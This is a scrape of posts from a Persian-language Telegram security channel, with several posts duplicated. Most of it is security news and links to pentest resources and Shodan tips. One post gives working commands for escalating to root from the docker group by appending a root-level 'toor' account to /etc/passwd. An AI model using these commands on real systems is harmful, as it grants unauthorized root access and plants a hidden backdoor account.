انتشار نسخه جدید لینوکس کالی با بروزرسانی کرنل، اضافه شدن ابزار و فیکس شدن مشکل باگهای Spectre و Meltdown
https://bit.ly/2PMJFxO
#kali
#Pentest
@sec_nerd
https://bit.ly/2PMJFxO
#kali
#Pentest
@sec_nerd
وبسایتی که ادعا میکند بهترین و واقعی ترین صداهای انسان را تولید میکند!
https://lyrebird.ai/
(فکر کنم اولین چیزی که به ذهن شما هم رسیده، استفاده از این سرویس برای مهندسی اجتماعی تلفنی هست!)
#social_engineering
@sec_nerd
https://lyrebird.ai/
(فکر کنم اولین چیزی که به ذهن شما هم رسیده، استفاده از این سرویس برای مهندسی اجتماعی تلفنی هست!)
#social_engineering
@sec_nerd
امنیت اطلاعات
جورج گاروفاندو ۲۶ ساله به جرم هک کردن چند بازیگر و سلبریتی و انتشار تصاویر مستهجن آنان توسط FBI دستگیر شد. وی از آپریل ۲۰۱۳ تا اکتبر ۲۰۱۴ با استفاده از حقه های فیشینگ موفق شد اطلاعات لاگین این سلبریتی ها را بدست آورده و وارد حساب های iCloud آنان شود. این هک…
جرج گاروفانو که پیش از این اقدام به نفوذ به حسابهای iCloud بیش از ۲۰۰ ستاره هالیوود از جمله جنیفر لارنس کرده بود، به هشت ماه زندان و سه سال آزادی مشروط و ۶۰ ساعت خدمات اجتماعی محکوم شد.
او با ارسال ایمیلهای فیشینگی که بنظر میرسید از سوی اپل باشند، درخواست نام کاربری و پسورد از افراد میکرد.
جنیفر لارنس به مجله Vanity Fair گفت : من پذیرفته ام که قربانی جنایت جنسی شده ام.
منبع:
https://news.sky.com/story/jennifer-lawrence-nude-photo-hacker-jailed-for-eight-months-11485374
#news
#icloud
#hollywood
#usa
@sec_nerd
او با ارسال ایمیلهای فیشینگی که بنظر میرسید از سوی اپل باشند، درخواست نام کاربری و پسورد از افراد میکرد.
جنیفر لارنس به مجله Vanity Fair گفت : من پذیرفته ام که قربانی جنایت جنسی شده ام.
منبع:
https://news.sky.com/story/jennifer-lawrence-nude-photo-hacker-jailed-for-eight-months-11485374
#news
#icloud
#hollywood
#usa
@sec_nerd
Sky News
Jennifer Lawrence nude photo hacker jailed for eight months
The Oscar winner was just one of a number of high profile figures targeted by a group of hackers who leaked private images.
قوانین انطباق و جایگزینی در burpsuite
https://matthewsetter.com/write-burp-suite-match-and-replace-rules/?platform=hootsuite
#burpsuite
#pentest
#tamper
#web
@sec_nerd
https://matthewsetter.com/write-burp-suite-match-and-replace-rules/?platform=hootsuite
#burpsuite
#pentest
#tamper
#web
@sec_nerd
هفت نکته برای آغاز کار با موتور جستجوی اینترنت اشیاء shodan:
۱- درک bannerها: باید بدانید که هر پورت که نماینده یک سرویس است، اغلب اطلاعاتی را از سرویس مربوطه نمایش میدهد، این اطلاعات میتواند شامل نسخه سرویس و پلتفرم باشد. صاحبان سرورها میتوانند برای گول زدن هکرها و موتورهای جستجو اطلاعات نادرستی نیز به آنها ارائه دهند.
۲- مطالعه کتاب «راهنمای shodan» که در این لینک موجود است :https://leanpub.com/shodan
۳- تهیه اکانت در این وبسایت. اکانتهای وبسایت shodan از رایگان تا چندصد دلار در ماه در دسترس هستند و میتوانید با توجه به نیاز خود، اقدام به ساخت حساب نمایید. پلن های پولی این وبسایت امکانات زیاد، فیلترهای متنوع و دیتاست های کاملتری را در اختیار شما میگذارند. حتی فیلتر vuln در پلن ۲۹۹ دلاری قابلیت جستجوی اکسپلویتهای ثبت شده برای هر سرویس را نیز دارا میباشد که این سرویس فقط در اختیار دانشگاه ها یا بیزینس های معتبر قرار میگیرد.
۴- استفاده از api این موتور جستجو، قابلیت ها و خروجی های بهتری را در اختیار شما میگذارد. این خروجی ها میتواند بصورت مستقیم در سیستم های مدیریت امنیت و آنالیزورها بکارگرفته شود.
۵-جستجوهای هدفمند و استفاده درست از فیلترها قدرت بیشتری به شما میدهد. با تهیه حساب ۴۹ دلاری و مادام العمر، میتوانید از فیلترهای مفید زیادی بهره ببرید. نمونه کوچکی از فیلترها را در لینک زیر ببینید:
https://github.com/coreb1t/awesome-pentest-cheat-sheets/blob/master/docs/shodan.md
۶- استفاده از shodan به تنهایی کارساز نیست. زمانی که شما دستگاه هدف خود را در این موتور پیدا میکنید، برای شناخت بهتر این دستگاه و دانستن جزییات آن، نیاز به گوگل و موتورهای جستجوی دیگر دارید و در این زمینه shodan نمیتواند به شما کمک کند و نام کاربری و پسورد پیش فرض دستگاه را به شما نشان دهد!
۷- استفاده از دو سرویس map و images این موتور جستجو به شما کمک میکند تا از متن های طولانی و گیج کننده خلاص شوید و زمانی که به دنبال کشف آسیب پذیری ها یا توزیع دستگاهها در گستره جهانی هستید، با تصاویر و نقشه ها درک بهتری از وضعیت بدست آورید.
🌺🌺 کپی برداری فقط با ذکر منبع 🌺🌺
اطلاعات بیشتر:
ubm.io/2Cg2uXF
#shodan
#iot
#pentest
#sec_nerd
@sec_nerd
۱- درک bannerها: باید بدانید که هر پورت که نماینده یک سرویس است، اغلب اطلاعاتی را از سرویس مربوطه نمایش میدهد، این اطلاعات میتواند شامل نسخه سرویس و پلتفرم باشد. صاحبان سرورها میتوانند برای گول زدن هکرها و موتورهای جستجو اطلاعات نادرستی نیز به آنها ارائه دهند.
۲- مطالعه کتاب «راهنمای shodan» که در این لینک موجود است :https://leanpub.com/shodan
۳- تهیه اکانت در این وبسایت. اکانتهای وبسایت shodan از رایگان تا چندصد دلار در ماه در دسترس هستند و میتوانید با توجه به نیاز خود، اقدام به ساخت حساب نمایید. پلن های پولی این وبسایت امکانات زیاد، فیلترهای متنوع و دیتاست های کاملتری را در اختیار شما میگذارند. حتی فیلتر vuln در پلن ۲۹۹ دلاری قابلیت جستجوی اکسپلویتهای ثبت شده برای هر سرویس را نیز دارا میباشد که این سرویس فقط در اختیار دانشگاه ها یا بیزینس های معتبر قرار میگیرد.
۴- استفاده از api این موتور جستجو، قابلیت ها و خروجی های بهتری را در اختیار شما میگذارد. این خروجی ها میتواند بصورت مستقیم در سیستم های مدیریت امنیت و آنالیزورها بکارگرفته شود.
۵-جستجوهای هدفمند و استفاده درست از فیلترها قدرت بیشتری به شما میدهد. با تهیه حساب ۴۹ دلاری و مادام العمر، میتوانید از فیلترهای مفید زیادی بهره ببرید. نمونه کوچکی از فیلترها را در لینک زیر ببینید:
https://github.com/coreb1t/awesome-pentest-cheat-sheets/blob/master/docs/shodan.md
۶- استفاده از shodan به تنهایی کارساز نیست. زمانی که شما دستگاه هدف خود را در این موتور پیدا میکنید، برای شناخت بهتر این دستگاه و دانستن جزییات آن، نیاز به گوگل و موتورهای جستجوی دیگر دارید و در این زمینه shodan نمیتواند به شما کمک کند و نام کاربری و پسورد پیش فرض دستگاه را به شما نشان دهد!
۷- استفاده از دو سرویس map و images این موتور جستجو به شما کمک میکند تا از متن های طولانی و گیج کننده خلاص شوید و زمانی که به دنبال کشف آسیب پذیری ها یا توزیع دستگاهها در گستره جهانی هستید، با تصاویر و نقشه ها درک بهتری از وضعیت بدست آورید.
🌺🌺 کپی برداری فقط با ذکر منبع 🌺🌺
اطلاعات بیشتر:
ubm.io/2Cg2uXF
#shodan
#iot
#pentest
#sec_nerd
@sec_nerd
Leanpub
Complete Guide to Shodan
Learn everything there is to know about Shodan from the founder himself. The book covers all aspects from the website through to the developer API.
اطلاعات ۲۰ هزار کاربر اپلیکیشن موبایلی Air Canada توسط هکرها مورد نفوذ قرار گرفت.
این رقم در حال زیاد شدن بود و هکر ناشناس قصد داشت وارد حسابهای بیشتری شود که با مشاهده لاگین های مشکوک، کارشناسان ایر کانادا حسابها را قفل و روند پیشرفت این هکر یا هکرها را متوقف کرده اند.
https://www.bleepingcomputer.com/news/security/air-canada-mobile-app-users-affected-by-data-breach/
#news
#breach
#canada
@sec_nerd
این رقم در حال زیاد شدن بود و هکر ناشناس قصد داشت وارد حسابهای بیشتری شود که با مشاهده لاگین های مشکوک، کارشناسان ایر کانادا حسابها را قفل و روند پیشرفت این هکر یا هکرها را متوقف کرده اند.
https://www.bleepingcomputer.com/news/security/air-canada-mobile-app-users-affected-by-data-breach/
#news
#breach
#canada
@sec_nerd
BleepingComputer
Air Canada Mobile App Users Affected By Data Breach
Air Canada informed today 20,000 of its mobile app users that information listed under their profile may have been accessed without authorization.
Out of Band Exploitation (OOB) CheatSheet
https://www.notsosecure.com/oob-exploitation-cheatsheet/
#oob
#web
#pentest
#must_read
@sec_nerd
https://www.notsosecure.com/oob-exploitation-cheatsheet/
#oob
#web
#pentest
#must_read
@sec_nerd
لیستی از آسیب پذیری های وب اپلیکیشن ها و روش های اکسپلویت کردن و دور زدن محدودیت ها
https://github.com/swisskyrepo/PayloadsAllTheThings
#web
#pentest
#exploit
@sec_nerd
https://github.com/swisskyrepo/PayloadsAllTheThings
#web
#pentest
#exploit
@sec_nerd
GitHub
GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF
A list of useful payloads and bypass for Web Application Security and Pentest/CTF - swisskyrepo/PayloadsAllTheThings
معرفی گروه هکرهای زیرزمینی Cobalt
این گروه برای نخستین بار در سال ۲۰۱۶ با سرقت پول نقد از دستگاه های خودپرداز با روش jackpotting شناسایی شد.
روش jackpotting با آلوده سازی دستگاه خودپرداز به بدافزار صورت میپذیرد.
گروه کبالت بصورت تخصصی سیستم های پرداخت، بانکها و سازمانهای تجاری را هدف قرار میدهد و این اهداف تاکنون در ۱۵ کشور قرار داشته اند.
در سال ۲۰۱۶ این هکرها تعداد زیادی ATM را در اروپا بصورت ریموت آلوده کردند. کشورهایی نظیر انگلیس، روسیه،رومانی، هلند، اسپانیا و ... از قربانیان این حمله بودند.
این بدافزار که بنظر میرسد ساخت گروه Buhtrap ATM gang باشد تنها از بانکهای روسیه، طی سالهای ۲۰۱۵ و ۲۰۱۶ مبلغ ۲۸ میلیون دلار سرقت کرد!
سال گذشته هکرهای کبالت با استفاده از آسیب پذیری CVE-2017-11882 که مربوط به آفیس بود و در تمامی نسخه های ویندوز کار میکرد، اقدام به ارسال ایمیل های فیشینگ و الصاق داکیومنتهای آلوده RTF و آلوده سازی اهداف خود کردند.
آنها در سال ۲۰۱۷ یک زنجیره تامین را در روسیه آلوده کردند. آنها همچنین از نسخه دستکاری شده باج افزار #petya برای پاک کردن ردپاهای خود استفاده میکردند.
در سال ۲۰۱۸ این هکرها بیکار نبودند و بازهم با هدف قراردادن کارمندان بانکها با حملات فیشینگ، سیستم های بانکی را آلوده کردند. آنها در طی یک عملیات دو ماهه موفق شدند مبلغ ۶۰۰ هزار دلار از بانکهای قزاقستان سرقت کنند.
در ماه آگوست نیز کبالت، دو بانک را در روسیه و رومانی مورد هدف قرار داد. در این حمله آنها از بکدورهای جاوا اسکریپتی استفاده کردند. در گامهای بعدی این بکدور اقدام به اتصال به دامینهای مختلف و دانلود فایلهای آپدیت و بدافزارهای دیگر میکند.
https://securityaffairs.co/wordpress/75793/cyber-crime/cobalt-campaign-russia-romania.html
#cobalt
#banking
#malware
#russia
#usa
#jackpotting
@sec_nerd
این گروه برای نخستین بار در سال ۲۰۱۶ با سرقت پول نقد از دستگاه های خودپرداز با روش jackpotting شناسایی شد.
روش jackpotting با آلوده سازی دستگاه خودپرداز به بدافزار صورت میپذیرد.
گروه کبالت بصورت تخصصی سیستم های پرداخت، بانکها و سازمانهای تجاری را هدف قرار میدهد و این اهداف تاکنون در ۱۵ کشور قرار داشته اند.
در سال ۲۰۱۶ این هکرها تعداد زیادی ATM را در اروپا بصورت ریموت آلوده کردند. کشورهایی نظیر انگلیس، روسیه،رومانی، هلند، اسپانیا و ... از قربانیان این حمله بودند.
این بدافزار که بنظر میرسد ساخت گروه Buhtrap ATM gang باشد تنها از بانکهای روسیه، طی سالهای ۲۰۱۵ و ۲۰۱۶ مبلغ ۲۸ میلیون دلار سرقت کرد!
سال گذشته هکرهای کبالت با استفاده از آسیب پذیری CVE-2017-11882 که مربوط به آفیس بود و در تمامی نسخه های ویندوز کار میکرد، اقدام به ارسال ایمیل های فیشینگ و الصاق داکیومنتهای آلوده RTF و آلوده سازی اهداف خود کردند.
آنها در سال ۲۰۱۷ یک زنجیره تامین را در روسیه آلوده کردند. آنها همچنین از نسخه دستکاری شده باج افزار #petya برای پاک کردن ردپاهای خود استفاده میکردند.
در سال ۲۰۱۸ این هکرها بیکار نبودند و بازهم با هدف قراردادن کارمندان بانکها با حملات فیشینگ، سیستم های بانکی را آلوده کردند. آنها در طی یک عملیات دو ماهه موفق شدند مبلغ ۶۰۰ هزار دلار از بانکهای قزاقستان سرقت کنند.
در ماه آگوست نیز کبالت، دو بانک را در روسیه و رومانی مورد هدف قرار داد. در این حمله آنها از بکدورهای جاوا اسکریپتی استفاده کردند. در گامهای بعدی این بکدور اقدام به اتصال به دامینهای مختلف و دانلود فایلهای آپدیت و بدافزارهای دیگر میکند.
https://securityaffairs.co/wordpress/75793/cyber-crime/cobalt-campaign-russia-romania.html
#cobalt
#banking
#malware
#russia
#usa
#jackpotting
@sec_nerd
Security Affairs
Cobalt cybercrime gang targets Russian and Romanian banks
On August 13, ASERT observed the Cobalt crime gang actively pushing a new campaign aimed at institutions in eastern Europe and Russia.
در لینک زیر خواهید دید چگونه میتوان با استفاده از موتور جستجوی shodan و یافتن دستگاههای Dreambox (دریم باکس شرکت تولید کننده رسیور و ست تاپ باکس است) در نهایت با توجه به وجود آسیب پذیری در این دستگاهها، قادر به اجرای دستور با سطح دسترسی روت خواهید بود.
https://the-infosec.com/2017/07/05/from-shodan-to-rce-opendreambox-2-0-0-code-execution/
#shodan
#iot
#rce
#dreambox
#pentest
@sec_nerd
https://the-infosec.com/2017/07/05/from-shodan-to-rce-opendreambox-2-0-0-code-execution/
#shodan
#iot
#rce
#dreambox
#pentest
@sec_nerd
Alfie Njeru
From Shodan to Remote Code Execution #2 – hacking OpenDreambox 2.0.0
A sequel to the last post of what is now becoming a series of “From Shodan to remote code execution”, we now take a look at how to hack misconfigured Dreambox installations. Dreambox is…
اگر به یک سیستم لینوکسی دسترسی دارید و id کاربر شما نشان میدهد که شما عضو گروه docker نیز هستید، میتوانید با دستورات زیر سطح دسترسی خود را در کانتینرها به روت افزایش دهید:
$> docker run -it --rm -v $PWD:/mnt bash
دستور زیر حسابی با نام کاربری toor و پسورد password اضافه خواهد کرد:
#> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
#docker
#linux
#privesc
#trick
@sec_nerd
$> docker run -it --rm -v $PWD:/mnt bash
دستور زیر حسابی با نام کاربری toor و پسورد password اضافه خواهد کرد:
#> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
#docker
#linux
#privesc
#trick
@sec_nerd
گزارشات امریکایی ها نشان میدهد که روسها در حال فعالیت بر روی نقاط ضعف این کشور برای تاثیرگذاری بر روی انتخابات میان دوره ای هستند.
روش اصلی بکار گرفته شده توسط روسها spear phishing است که در آن ایمیلهایی حاوی لینکهایی به وبسایتهای جعلی قرار دارد. روسها با این روش موفق شدند کمیته ملی دموکراتها را پیش از این هک کنند.
با توجه به انتشار عمومی بدافزارهایی که از آژانس های اطلاعاتی دزدیده شده اند، حال هکرها میتوانند به راحتی اطلاعات ارزشمند و حجیمی را از افراد سرقت کنند. تنها هفته پیش مایکروسافت ۶ دامنه جعلی را که گویا توسط روسها رجیستر شده بودند بلاک کرد.
به لطف جهانی سازی نام دامنه ها، حالا به هر زبانی میتوان دامنه ساخت و این به هکرها کمک میکند تا با استفاده از علائم خاص (homoglyphs) و گول زننده دامین های جعلی ای ثبت کنند که تشخیص آن در نگاه اول حتی برای کارشناسان امنیت و اینترنت نیز آسان نیست. (نمونه این مورد را در تبلیغ تلگرامی آدیداس و بی ام و دیده اید)
داستان زمانی تلخ تر میشود که این دامین های جعلی با گواهینامه های دیجیتال (https) اعتمادسازی بی نظیری را در قربانی خود ایجاد میکنند. برای مثال تنها در سال گذشته ۱۵ هزار وبسایت ترکیبی از نام paypal را داشتند و گواهینامه دیجیتال دریافت کرده بودند.
بنظر میرسد بکارگیری یک چارچوب شفافیت برای تشخیص اعتبار گواهینامه های دیجیتال و حتی نام دامنه ها و صفحات شبکه های اجتماعی الزامی میباشد.
در نهایت آموزش افراد بسیار حائز اهمیت بوده و باید در اولویت قرار گیرد.
منبع:
https://edition.cnn.com/2018/09/01/opinions/spear-phishing-has-become-even-more-dangerous-opinion-vishwanath/index.html
#news
#usa
#russia
#iran
#electron
#dnc
#spear_phishing
@sec_nerd
روش اصلی بکار گرفته شده توسط روسها spear phishing است که در آن ایمیلهایی حاوی لینکهایی به وبسایتهای جعلی قرار دارد. روسها با این روش موفق شدند کمیته ملی دموکراتها را پیش از این هک کنند.
با توجه به انتشار عمومی بدافزارهایی که از آژانس های اطلاعاتی دزدیده شده اند، حال هکرها میتوانند به راحتی اطلاعات ارزشمند و حجیمی را از افراد سرقت کنند. تنها هفته پیش مایکروسافت ۶ دامنه جعلی را که گویا توسط روسها رجیستر شده بودند بلاک کرد.
به لطف جهانی سازی نام دامنه ها، حالا به هر زبانی میتوان دامنه ساخت و این به هکرها کمک میکند تا با استفاده از علائم خاص (homoglyphs) و گول زننده دامین های جعلی ای ثبت کنند که تشخیص آن در نگاه اول حتی برای کارشناسان امنیت و اینترنت نیز آسان نیست. (نمونه این مورد را در تبلیغ تلگرامی آدیداس و بی ام و دیده اید)
داستان زمانی تلخ تر میشود که این دامین های جعلی با گواهینامه های دیجیتال (https) اعتمادسازی بی نظیری را در قربانی خود ایجاد میکنند. برای مثال تنها در سال گذشته ۱۵ هزار وبسایت ترکیبی از نام paypal را داشتند و گواهینامه دیجیتال دریافت کرده بودند.
بنظر میرسد بکارگیری یک چارچوب شفافیت برای تشخیص اعتبار گواهینامه های دیجیتال و حتی نام دامنه ها و صفحات شبکه های اجتماعی الزامی میباشد.
در نهایت آموزش افراد بسیار حائز اهمیت بوده و باید در اولویت قرار گیرد.
منبع:
https://edition.cnn.com/2018/09/01/opinions/spear-phishing-has-become-even-more-dangerous-opinion-vishwanath/index.html
#news
#usa
#russia
#iran
#electron
#dnc
#spear_phishing
@sec_nerd
CNN
Spear phishing has become even more dangerous
Arun Vishwanath says Russian hackers can take advantage of several weaknesses of procedures on the Internet, and the vulnerabilities are growing worse
👍1
امنیت اطلاعات
هفت نکته برای آغاز کار با موتور جستجوی اینترنت اشیاء shodan: ۱- درک bannerها: باید بدانید که هر پورت که نماینده یک سرویس است، اغلب اطلاعاتی را از سرویس مربوطه نمایش میدهد، این اطلاعات میتواند شامل نسخه سرویس و پلتفرم باشد. صاحبان سرورها میتوانند برای گول…
نمونه هایی از برخی نام های کاربری و پسوردهای پیش فرض در دستگاهها که میتوان با استفاده از موتور جستجوی اینترنت اشیاء shodan یافت
(مربوط به بند ۶ پست ریپلای شده)
https://www.behindthefirewalls.com/2013/04/hakcking-with-default-credentials-and.html
#shodan
#network
#pentest
@sec_nerd
(مربوط به بند ۶ پست ریپلای شده)
https://www.behindthefirewalls.com/2013/04/hakcking-with-default-credentials-and.html
#shodan
#network
#pentest
@sec_nerd
Behindthefirewalls
Hakcking with default credentials and Shodan
Do you think that the personal from the IT department have default password in their equipments of a production environment? The answer is....